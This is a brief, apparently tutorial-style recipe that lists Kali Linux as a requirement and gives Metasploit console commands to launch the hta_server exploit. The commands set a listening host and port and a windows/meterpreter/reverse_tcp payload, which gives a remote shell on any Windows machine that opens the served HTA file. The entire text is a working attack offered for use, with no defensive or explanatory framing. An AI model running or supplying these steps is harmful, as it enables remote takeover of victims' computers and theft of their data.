
Requirements :
Kali Linux
Internet
msfconsole
use exploit/windows/misc/hta_server
set lhost 172.46.22.155 (replace your ip here)
set srvhost 172.46.22.155 (replace your ip here)
set payload windows/meterpreter/reverse_tcp
set lport 8111
exploit